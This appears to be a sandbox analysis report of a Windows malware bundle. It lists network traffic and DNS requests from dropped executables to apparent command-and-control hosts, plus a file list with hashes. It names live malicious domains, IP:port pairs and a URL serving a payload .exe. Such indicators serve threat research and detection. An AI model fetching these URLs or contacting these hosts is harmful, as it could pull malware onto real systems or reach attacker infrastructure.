                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D30%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D30%2526e%253D1
                              tls, http2
                              chrome.exe
                              2.1kB
                              9.8kB
                              14
                              15

                              HTTP Request

                              GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D30%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D30%2526e%253D1
                            • 107.178.223.183:80
                              telegka.top
                              Tue200ab8d408d.exe
                              208 B
                              4
                            • 216.58.213.1:443
                              https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx
                              tls, http2
                              chrome.exe
                              4.7kB
                              153.6kB
                              77
                              117

                              HTTP Request

                              GET https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 172.67.19.24:443
                              https://pastebin.com/raw/A7dSG1te
                              tls, http
                              Tue202dc71d1d41.exe
                              859 B
                              4.8kB
                              8
                              8

                              HTTP Request

                              GET https://pastebin.com/raw/A7dSG1te

                              HTTP Response

                              404
                            • 172.67.133.215:80
                              http://wfsdragon.ru/api/setStats.php
                              http
                              Tue202dc71d1d41.exe
                              482 B
                              2.1kB
                              6
                              5

                              HTTP Request

                              GET http://wfsdragon.ru/api/setStats.php

                              HTTP Response

                              404
                            • 51.178.186.149:80
                              Tue202dc71d1d41.exe
                              208 B
                              4
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              208 B
                              160 B
                              4
                              4
                            • 72.84.118.132:8080
                              msiexec.exe
                              208 B
                              4
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              52 B
                              40 B
                              1
                              1
                            • 91.121.67.60:2151
                              Tue207c76c7f37.exe
                              208 B
                              4
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              208 B
                              4
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              160 B
                              5
                              4
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 104.155.138.21:80
                              telegka.top
                              Tue200ab8d408d.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 92.61.37.60:443
                              https://futurepreneurs.eu/wp-content/plugins/dn-events/Dv31BrowInst.exe
                              tls, http
                              msiexec.exe
                              1.1kB
                              4.0kB
                              11
                              7

                              HTTP Request

                              GET https://futurepreneurs.eu/wp-content/plugins/dn-events/Dv31BrowInst.exe

                              HTTP Response

                              403
                            • 2.23.210.82:80
                              http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSIsOGkgwGcfsYBBl1dpdGBWQ%3D%3D
                              http
                              msiexec.exe
                              470 B
                              1.0kB
                              5
                              3

                              HTTP Request

                              GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSIsOGkgwGcfsYBBl1dpdGBWQ%3D%3D

                              HTTP Response

                              200
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              260 B
                              5
                            • 91.121.67.60:2151
                              Tue207c76c7f37.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 107.178.223.183:80
                              telegka.top
                              Tue200ab8d408d.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              260 B
                              5
                            • 127.0.0.1:49507
                              setup_install.exe
                            • 127.0.0.1:49509
                              setup_install.exe
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 91.121.67.60:2151
                              Tue207c76c7f37.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                            • 104.155.138.21:80
                              telegka.top
                              Tue200ab8d408d.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              260 B
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 91.121.67.60:2151
                              Tue207c76c7f37.exe
                              260 B
                              5
                            • 107.178.223.183:80
                              telegka.top
                              Tue200ab8d408d.exe
                              260 B
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              260 B
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 104.155.138.21:80
                              telegka.top
                              Tue200ab8d408d.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 91.121.67.60:2151
                              Tue207c76c7f37.exe
                              208 B
                              4
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              208 B
                              4
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              52 B
                              40 B
                              1
                              1
                            • 8.8.8.8:53
                              196.249.167.52.in-addr.arpa
                              dns
                              73 B
                              147 B
                              1
                              1

                              DNS Request

                              196.249.167.52.in-addr.arpa

                            • 8.8.8.8:53
                              20.160.190.20.in-addr.arpa
                              dns
                              72 B
                              158 B
                              1
                              1

                              DNS Request

                              20.160.190.20.in-addr.arpa

                            • 8.8.8.8:53
                              wensela.xyz
                              dns
                              setup_install.exe
                              57 B
                              122 B
                              1
                              1

                              DNS Request

                              wensela.xyz

                            • 8.8.8.8:53
                              95.221.229.192.in-addr.arpa
                              dns
                              73 B
                              144 B
                              1
                              1

                              DNS Request

                              95.221.229.192.in-addr.arpa

                            • 8.8.8.8:53
                              www.listincode.com
                              dns
                              Tue2095db5b6bd7.exe
                              64 B
                              185 B
                              1
                              1

                              DNS Request

                              www.listincode.com

                              DNS Response

                              52.203.72.196
                              54.84.177.46

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              cdn.discordapp.com
                              dns
                              Tue20abd30733a17.exe
                              64 B
                              144 B
                              1
                              1

                              DNS Request

                              cdn.discordapp.com

                              DNS Response

                              162.159.135.233
                              162.159.133.233
                              162.159.129.233
                              162.159.130.233
                              162.159.134.233

                            • 8.8.8.8:53
                              niemannbest.me
                              dns
                              Tue203dd57461.exe
                              60 B
                              126 B
                              1
                              1

                              DNS Request

                              niemannbest.me

                            • 8.8.8.8:53
                              all-mobile-pa1ments.com.mx
                              dns
                              Tue203dd57461.exe
                              72 B
                              131 B
                              1
                              1

                              DNS Request

                              all-mobile-pa1ments.com.mx

                            • 8.8.8.8:53
                              buy-fantasy-football.com.sg
                              dns
                              Tue203dd57461.exe
                              73 B
                              122 B
                              1
                              1

                              DNS Request

                              buy-fantasy-football.com.sg

                            • 8.8.8.8:53
                              t.gogamec.com
                              dns
                              Tue20ea834764a6.exe
                              59 B
                              132 B
                              1
                              1

                              DNS Request

                              t.gogamec.com

                            • 8.8.8.8:53
                              topniemannpickshop.cc
                              dns
                              Tue203dd57461.exe
                              67 B
                              134 B
                              1
                              1

                              DNS Request

                              topniemannpickshop.cc

                            • 8.8.8.8:53
                              233.135.159.162.in-addr.arpa
                              dns
                              74 B
                              136 B
                              1
                              1

                              DNS Request

                              233.135.159.162.in-addr.arpa

                            • 8.8.8.8:53
                              iplogger.org
                              dns
                              Tue2095db5b6bd7.exe
                              58 B
                              106 B
                              1
                              1

                              DNS Request

                              iplogger.org

                              DNS Response

                              104.26.3.46
                              172.67.74.161
                              104.26.2.46

                            • 8.8.8.8:53
                              propanla.com
                              dns
                              Tue201d50e7015.tmp
                              58 B
                              131 B
                              1
                              1

                              DNS Request

                              propanla.com

                            • 8.8.8.8:53
                              46.3.26.104.in-addr.arpa
                              dns
                              70 B
                              132 B
                              1
                              1

                              DNS Request

                              46.3.26.104.in-addr.arpa

                            • 8.8.8.8:53
                              telegatt.top
                              dns
                              Tue200ab8d408d.exe
                              58 B
                              128 B
                              1
                              1

                              DNS Request

                              telegatt.top

                            • 8.8.8.8:53
                              gcl-gb.biz
                              dns
                              Tue2082eedf21.exe
                              56 B
                              118 B
                              1
                              1

                              DNS Request

                              gcl-gb.biz

                            • 8.8.8.8:53
                              241.150.49.20.in-addr.arpa
                              dns
                              72 B
                              158 B
                              1
                              1

                              DNS Request

                              241.150.49.20.in-addr.arpa

                            • 8.8.8.8:53
                              t.gogamec.com
                              dns
                              Tue20ea834764a6.exe
                              59 B
                              132 B
                              1
                              1

                              DNS Request

                              t.gogamec.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              c.pki.goog
                              dns
                              Tue2095db5b6bd7.exe
                              56 B
                              107 B
                              1
                              1

                              DNS Request

                              c.pki.goog

                              DNS Response

                              142.250.187.227

                            • 8.8.8.8:53
                              227.187.250.142.in-addr.arpa
                              dns
                              74 B
                              112 B
                              1
                              1

                              DNS Request

                              227.187.250.142.in-addr.arpa

                            • 8.8.8.8:53
                              telegatt.top
                              dns
                              Tue200ab8d408d.exe
                              58 B
                              128 B
                              1
                              1

                              DNS Request

                              telegatt.top

                            • 8.8.8.8:53
                              t.gogamec.com
                              dns
                              Tue20ea834764a6.exe
                              59 B
                              132 B
                              1
                              1

                              DNS Request

                              t.gogamec.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              gcl-gb.biz
                              dns
                              Tue2082eedf21.exe
                              56 B
                              118 B
                              1
                              1

                              DNS Request

                              gcl-gb.biz

                            • 8.8.8.8:53
                              www.iyiqian.com
                              dns
                              Tue2095db5b6bd7.exe
                              61 B
                              77 B
                              1
                              1

                              DNS Request

                              www.iyiqian.com

                              DNS Response

                              13.251.16.150

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              t.gogamec.com
                              dns
                              Tue20ea834764a6.exe
                              59 B
                              132 B
                              1
                              1

                              DNS Request

                              t.gogamec.com

                            • 8.8.8.8:53
                              150.16.251.13.in-addr.arpa
                              dns
                              72 B
                              140 B
                              1
                              1

                              DNS Request

                              150.16.251.13.in-addr.arpa

                            • 8.8.8.8:53
                              telegatt.top
                              dns
                              Tue200ab8d408d.exe
                              58 B
                              128 B
                              1
                              1

                              DNS Request

                              telegatt.top

                            • 8.8.8.8:53
                              www.google.com
                              dns
                              chrome.exe
                              60 B
                              76 B
                              1
                              1

                              DNS Request

                              www.google.com

                              DNS Response

                              142.250.179.228

                            • 8.8.8.8:53
                              3.180.250.142.in-addr.arpa
                              dns
                              72 B
                              110 B
                              1
                              1

                              DNS Request

                              3.180.250.142.in-addr.arpa

                            • 8.8.8.8:53
                              202.212.58.216.in-addr.arpa
                              dns
                              73 B
                              173 B
                              1
                              1

                              DNS Request

                              202.212.58.216.in-addr.arpa

                            • 8.8.8.8:53
                              228.179.250.142.in-addr.arpa
                              dns
                              74 B
                              112 B
                              1
                              1

                              DNS Request

                              228.179.250.142.in-addr.arpa

                            • 8.8.8.8:53
                              ogads-pa.googleapis.com
                              dns
                              chrome.exe
                              69 B
                              325 B
                              1
                              1

                              DNS Request

                              ogads-pa.googleapis.com

                              DNS Response

                              142.250.187.234
                              172.217.169.10
                              216.58.212.202
                              172.217.169.42
                              142.250.200.42
                              142.250.179.234
                              142.250.180.10
                              172.217.16.234
                              216.58.204.74
                              172.217.169.74
                              216.58.201.106
                              142.250.200.10
                              142.250.187.202
                              142.250.178.10
                              216.58.213.10
                              216.58.212.234

                            • 8.8.8.8:53
                              apis.google.com
                              dns
                              chrome.exe
                              61 B
                              98 B
                              1
                              1

                              DNS Request

                              apis.google.com

                              DNS Response

                              216.58.201.110

                            • 142.250.187.234:443
                              ogads-pa.googleapis.com
                              https
                              chrome.exe
                              3.0kB
                              6.5kB
                              6
                              8
                            • 8.8.8.8:53
                              234.187.250.142.in-addr.arpa
                              dns
                              74 B
                              113 B
                              1
                              1

                              DNS Request

                              234.187.250.142.in-addr.arpa

                            • 8.8.8.8:53
                              110.201.58.216.in-addr.arpa
                              dns
                              73 B
                              173 B
                              1
                              1

                              DNS Request

                              110.201.58.216.in-addr.arpa

                            • 8.8.8.8:53
                              play.google.com
                              dns
                              chrome.exe
                              61 B
                              77 B
                              1
                              1

                              DNS Request

                              play.google.com

                              DNS Response

                              172.217.16.238

                            • 8.8.8.8:53
                              telegka.top
                              dns
                              Tue200ab8d408d.exe
                              57 B
                              89 B
                              1
                              1

                              DNS Request

                              telegka.top

                              DNS Response

                              107.178.223.183
                              104.155.138.21

                            • 8.8.8.8:53
                              clients2.google.com
                              dns
                              chrome.exe
                              65 B
                              105 B
                              1
                              1

                              DNS Request

                              clients2.google.com

                              DNS Response

                              142.250.178.14

                            • 8.8.8.8:53
                              238.16.217.172.in-addr.arpa
                              dns
                              73 B
                              142 B
                              1
                              1

                              DNS Request

                              238.16.217.172.in-addr.arpa

                            • 8.8.8.8:53
                              14.178.250.142.in-addr.arpa
                              dns
                              73 B
                              112 B
                              1
                              1

                              DNS Request

                              14.178.250.142.in-addr.arpa

                            • 8.8.8.8:53
                              clients2.googleusercontent.com
                              dns
                              chrome.exe
                              76 B
                              121 B
                              1
                              1

                              DNS Request

                              clients2.googleusercontent.com

                              DNS Response

                              216.58.213.1

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              t.gogamec.com
                              dns
                              Tue20ea834764a6.exe
                              59 B
                              132 B
                              1
                              1

                              DNS Request

                              t.gogamec.com

                            • 8.8.8.8:53
                              1.213.58.216.in-addr.arpa
                              dns
                              71 B
                              138 B
                              1
                              1

                              DNS Request

                              1.213.58.216.in-addr.arpa

                            • 8.8.8.8:53
                              pastebin.com
                              dns
                              Tue202dc71d1d41.exe
                              58 B
                              106 B
                              1
                              1

                              DNS Request

                              pastebin.com

                              DNS Response

                              172.67.19.24
                              104.20.4.235
                              104.20.3.235

                            • 8.8.8.8:53
                              wfsdragon.ru
                              dns
                              Tue202dc71d1d41.exe
                              58 B
                              90 B
                              1
                              1

                              DNS Request

                              wfsdragon.ru

                              DNS Response

                              172.67.133.215
                              104.21.5.208

                            • 8.8.8.8:53
                              24.19.67.172.in-addr.arpa
                              dns
                              71 B
                              133 B
                              1
                              1

                              DNS Request

                              24.19.67.172.in-addr.arpa

                            • 8.8.8.8:53
                              215.133.67.172.in-addr.arpa
                              dns
                              73 B
                              135 B
                              1
                              1

                              DNS Request

                              215.133.67.172.in-addr.arpa

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              t.gogamec.com
                              dns
                              Tue20ea834764a6.exe
                              59 B
                              132 B
                              1
                              1

                              DNS Request

                              t.gogamec.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              136.32.126.40.in-addr.arpa
                              dns
                              72 B
                              158 B
                              1
                              1

                              DNS Request

                              136.32.126.40.in-addr.arpa

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              futurepreneurs.eu
                              dns
                              msiexec.exe
                              126 B
                              158 B
                              2
                              2

                              DNS Request

                              futurepreneurs.eu

                              DNS Request

                              futurepreneurs.eu

                              DNS Response

                              92.61.37.60

                              DNS Response

                              92.61.37.60

                            • 8.8.8.8:53
                              32.169.19.2.in-addr.arpa
                              dns
                              70 B
                              133 B
                              1
                              1

                              DNS Request

                              32.169.19.2.in-addr.arpa

                            • 8.8.8.8:53
                              60.37.61.92.in-addr.arpa
                              dns
                              140 B
                              210 B
                              2
                              2

                              DNS Request

                              60.37.61.92.in-addr.arpa

                              DNS Request

                              60.37.61.92.in-addr.arpa

                            • 8.8.8.8:53
                              r11.o.lencr.org
                              dns
                              msiexec.exe
                              61 B
                              160 B
                              1
                              1

                              DNS Request

                              r11.o.lencr.org

                              DNS Response

                              2.23.210.82
                              2.23.210.75

                            • 8.8.8.8:53
                              www.qxsgxd.com
                              dns
                              msiexec.exe
                              60 B
                              133 B
                              1
                              1

                              DNS Request

                              www.qxsgxd.com

                            • 8.8.8.8:53
                              82.210.23.2.in-addr.arpa
                              dns
                              70 B
                              133 B
                              1
                              1

                              DNS Request

                              82.210.23.2.in-addr.arpa

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              69.190.18.2.in-addr.arpa
                              dns
                              70 B
                              133 B
                              1
                              1

                              DNS Request

                              69.190.18.2.in-addr.arpa

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                            • 8.8.8.8:53
                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            • 8.8.8.8:53
                              s.lletlee.com
                              dns
                              Tue20d8f1968de62f282.exe
                              59 B
                              129 B
                              1
                              1

                              DNS Request

                              s.lletlee.com

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                              Filesize

                              2B

                              MD5

                              d751713988987e9331980363e24189ce

                              SHA1

                              97d170e1550eee4afc0af065b78cda302a97674c

                              SHA256

                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                              SHA512

                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                              Filesize

                              356B

                              MD5

                              ad78c11a7e86c15cdc37589c5f7d13bc

                              SHA1

                              0bf3236f04c569230b2ca70763a9ec531600f051

                              SHA256

                              0df478940d5006d1eeb4a7a200bafae17cbd080dded8d49acc16da3067a8240d

                              SHA512

                              6432af0f5cc343794eff358b6dba8bec2333486f44b890ea08d3fd5f22ff782e32c1f2356cef7ce23e4d84dfb9adf5ee4af324fab377b2a2d928eda1c2d81802

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue2082ea84bd.exe.log

                              Filesize

                              700B

                              MD5

                              e5352797047ad2c91b83e933b24fbc4f

                              SHA1

                              9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

                              SHA256

                              b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

                              SHA512

                              dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              3d086a433708053f9bf9523e1d87a4e8

                              SHA1

                              b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

                              SHA256

                              6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

                              SHA512

                              931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              16KB

                              MD5

                              1cba038ae9fbd84a74dc06f1325688d1

                              SHA1

                              85a71043ff589454fa0106bb1575584bdcbf5823

                              SHA256

                              5024e646b25ab784c1ac40b9a430be770a7325f0295393ff07195345a3079b19

                              SHA512

                              abcab67a6e08c454b19dd83eda3f4b83de5f8c26e035188896475274b8e0731a612ae213ecfa5af54508cd68d7ba1e02c81336432f1904a2f70c1a3f77bd4155

                            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue200ab8d408d.exe

                              Filesize

                              545KB

                              MD5

                              c1bc0cca3a8784bbc7d5d3e9e47e6ba4

                              SHA1

                              500970243e0e1dd57e2aad4f372da395d639b4a3

                              SHA256

                              5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1

                              SHA512

                              929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

                            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue201d50e7015.exe

                              Filesize

                              379KB

                              MD5

                              7c20266d1026a771cc3748fe31262057

                              SHA1

                              fc83150d1f81bfb2ff3c3d004ca864d53004fd27

                              SHA256

                              4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46

                              SHA512

                              e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

                            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue202dc71d1d41.exe

                              Filesize

                              403KB

                              MD5

                              962b4643e91a2bf03ceeabcdc3d32fff

                              SHA1

                              994eac3e4f3da82f19c3373fdc9b0d6697a4375d

                              SHA256

                              d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b

                              SHA512

                              ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

                            • C:\Users\Admin\AppData\Local\Temp\7zS446BDEE7\Tue203dd57461.exe

                              Filesize

                              66KB

                              MD5

                              26278caf1df5ef5ea045185380a1d7c9

                              SHA1

